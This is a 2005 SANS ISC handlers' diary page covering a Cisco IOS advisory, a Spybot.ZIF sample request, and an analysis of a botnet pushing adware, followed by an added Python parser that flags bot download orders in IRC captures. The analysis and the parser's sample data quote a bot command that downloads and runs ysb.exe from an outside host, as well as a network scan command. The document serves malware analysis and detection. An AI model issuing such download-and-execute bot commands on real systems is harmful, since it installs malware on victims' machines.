Threat Level: green Handler on Duty: Pedro Bueno

SANS ISC InfoSec Handlers Diary Blog



Cisco IOS Security Advisory

Published: 2005-11-03
Last Updated: 2005-11-03 20:45:14 UTC
by Pedro Bueno (Version: 2)

Today Cisco released an advisory regarding the IOS Heap-based Overflow Vulnerability in System Timers. It can be found here. Some users wrote to us asking whether they should rush to upgrade their routers. In the words of one of our handlers, a brief explanation is that "this is related to the IPv6 vulnerability that Cisco released patches for midyear AND the Mike Lynn Black Hat briefing, which exploited that vulnerability and a timer vulnerability."
-------------------------------------------------------------
Handler on Duty: Pedro Bueno (pbueno //%// isc. sans. org)

Sample needed - of Spybot.ZIF, which scans for vulnerable Cisco Routers

Published: 2005-11-02
Last Updated: 2005-11-02 20:40:02 UTC
by Patrick Nolan (Version: 3)
According to Symantec, W32.Spybot.ZIF "allows a remote attacker" to, among other things, "Scan a specified network range for Cisco routers that may have vulnerable Telnet or HTTP servers running and report results back to IRC."

If anyone catches a sample of this one please upload it through our contact page. Thanks!

Thanks to Jakob S for sending us the sample.

Its MD5 sum is:

2ec1fa5fca52b9c36bddea3511178882  svcdata.exe

If you have a sample with a different hash, please let us know.
For what it's worth, Symantec detects this as W32.Spybot.ZIF while Kaspersky detects it as Backdoor.Win32.Rbot.adf.

Malware Analysis Quiz IV

Published: 2005-11-02
Last Updated: 2005-11-02 14:46:48 UTC
by Pedro Bueno (Version: 1)
For those following my quizzes, today I posted the answers for Part III and posted the new one as well...:)
If you missed the previous ones, there is still time to start...!:)
Check it here!
------------------------------------------------------------
Handler on Duty: Pedro Bueno ( pbueno //%// isc. sans. org)

6 bagle versions in 1 day

Published: 2005-11-02
Last Updated: 2005-11-02 13:23:08 UTC
by Pedro Bueno (Version: 1)
According to viruslist.com: "The Bagles are continuing to come in. We've detected 6 new variants so far, and just released an urgent update. The first 2 - 3 variants were aggressively spammed. The others have been placed on sites and will be downloaded to victim machines. It's the latest move to keep the botnet up and running."

So, check your virus definitions and make sure you have the newest ones as soon as possible.
--------------------------------------------------------------
Handler On Duty: Pedro Bueno ( pbueno //%// isc. sans. org)

Botnets and the Adware/Spyware Connection

Published: 2005-11-02
Last Updated: 2005-11-02 12:47:14 UTC
by Pedro Bueno (Version: 1)
I am sure you already know about botnets, right? Ok, I am quite sure that you also know that one of the purposes of botnets, besides all the nice stuff written by our handler Mike Poor in his diary Big Business surrounding Internet Fraud, is to spread malware, right? Ok (again), today I would like to show you how botnets are also spreading adware/spyware. As the bot is remotely controlled by the botnet owner, it can do anything...
While investigating a bot today, I found this instruction to the bot:

:MySQL 332 USA|xxxxxxx #c :xdownload32 http://news-affairs.com/ysb.exe c:\ysb.exe 1

This instruction told my bot to download the ysb.exe 'software' to my computer and open it, as the next messages show:

#c :[DOWNLOAD]: Downloading URL: http://news-affairs.com/ysb.exe to: c:\ysb.exe.
#c :[DOWNLOAD]: Downloaded 67.3 KB to c:\ysb.exe @ 33.6 KB/sec.
#c :[DOWNLOAD]: Opened: c:\ysb.exe.

As soon as it was downloaded and opened, this window came up:

This 'software' is recognized by some AV at VirusTotal as a downloader or ISTbar.
Nice points from the License Agreement:

9. OTHER SOFTWARE. You allow that third party software may be installed in the Software and the Integrated Search Technologies shall not be liable to anyone with respect to such third party software.
16. UPDATES. You grant Integrated Search Technologies permission to add/remove features and/or functions to the existing Software and/or Service, or to install new applications or third party software, at any time, in its sole discretion with or without your knowledge and/or interaction. By doing so, you agree to the terms of the new applications. You also grant Integrated Search Technologies permission to make any changes to the Software and/or Service provided at any time.

Ok, ok...old stuff, but it is always nice to know how these things suddenly appear on your computer...:)
------------------------------------------------------------------
Handler on Duty: Pedro Bueno
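The command line quoted in the diary above is worth reading as raw IRC: the numeric 332 is RPL_TOPIC, so the download-and-execute order was not typed to the bot directly, it was the channel topic of #c, which every bot receives the moment it joins. The following is an added example, not code from the diary or from the ISC: a small parser that walks captured IRC traffic and flags Rbot/Spybot-style download orders carried in a topic (332 or TOPIC) or a PRIVMSG. The "xdownload32 URL localpath runflag" syntax and the meaning of the trailing 1 come from the diary's log; the sample capture is constructed here (only the first line is the diary's), and the ".scan" line and the acceptance of a bare "download" keyword are assumptions about other variants, not something the diary shows.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample capture. Line 1 is the RPL_TOPIC (332) message quoted in the
# diary; the remaining lines are hypothetical, added for contrast and not real traffic.
CAPTURED_IRC = """\
:MySQL 332 USA|xxxxxxx #c :xdownload32 http://news-affairs.com/ysb.exe c:\\ysb.exe 1
:oper!o@host PRIVMSG #c :hello everyone
:oper!o@host TOPIC #c :xdownload32 http://example.invalid/update.exe c:\\upd.exe 0
:MySQL 332 USA|xxxxxxx #c :.scan 192.168.0.0 255.255.0.0
"""

# Generic IRC message: optional ":prefix", a command or numeric, middle params
# (which may not start with ':'), and an optional ":trailing" param.
IRC_LINE = re.compile(
    r"^(?::(?P<prefix>\S+)\s+)?(?P<command>\S+)(?P<params>(?:\s+[^:\s]\S*)*)"
    r"(?:\s+:(?P<trailing>.*))?$"
)

# Download order as seen in the diary: <cmd> <url> <local path> [<run flag>].
# "xdownload32" is the diary's spelling; matching any token containing "download"
# (e.g. a bare "download") is an assumption about related bot families.
DOWNLOAD_CMD = re.compile(
    r"^(?P<cmd>\S*download\S*)\s+(?P<url>https?://\S+)\s+(?P<path>\S+)"
    r"(?:\s+(?P<run>[01]))?\s*$",
    re.IGNORECASE,
)

# IRC commands whose trailing text a bot treats as instructions.
ORDER_CARRIERS = ("332", "TOPIC", "PRIVMSG")


@dataclass
class DownloadOrder:
    via: str                 # "332" (RPL_TOPIC), "TOPIC" or "PRIVMSG"
    channel: Optional[str]   # channel the order was posted to, if any
    url: str                 # where the bot is told to fetch the payload
    local_path: str          # where it is told to write it
    execute: bool            # trailing flag 1 = open it after download (per the diary's log)


def parse_irc(line: str) -> Optional[Tuple[Optional[str], str, List[str], Optional[str]]]:
    """Split one raw IRC line into (prefix, COMMAND, [middle params], trailing)."""
    m = IRC_LINE.match(line.strip())
    if not m:
        return None
    return (m.group("prefix"), m.group("command").upper(),
            m.group("params").split(), m.group("trailing"))


def find_download_orders(capture: str) -> List[DownloadOrder]:
    """Return every download order found in a block of captured IRC lines."""
    orders: List[DownloadOrder] = []
    for raw in capture.splitlines():
        parsed = parse_irc(raw)
        if parsed is None:
            continue
        _prefix, command, params, trailing = parsed
        if command not in ORDER_CARRIERS or not trailing:
            continue
        dm = DOWNLOAD_CMD.match(trailing)
        if not dm:
            continue
        channel = next((p for p in params if p.startswith("#")), None)
        orders.append(DownloadOrder(
            via=command,
            channel=channel,
            url=dm.group("url"),
            local_path=dm.group("path"),
            execute=dm.group("run") == "1",
        ))
    return orders


if __name__ == "__main__":
    for order in find_download_orders(CAPTURED_IRC):
        action = "download AND run" if order.execute else "download only"
        print(f"[{order.via}] {order.channel}: {action} {order.url} -> {order.local_path}")
```

On the constructed capture this reports two orders: the diary's topic-delivered fetch of ysb.exe with execution, and the hypothetical TOPIC line without it; the chat line and the scan command are ignored. In a real capture the URLs and local paths it extracts are the indicators worth blocking and hunting for on hosts.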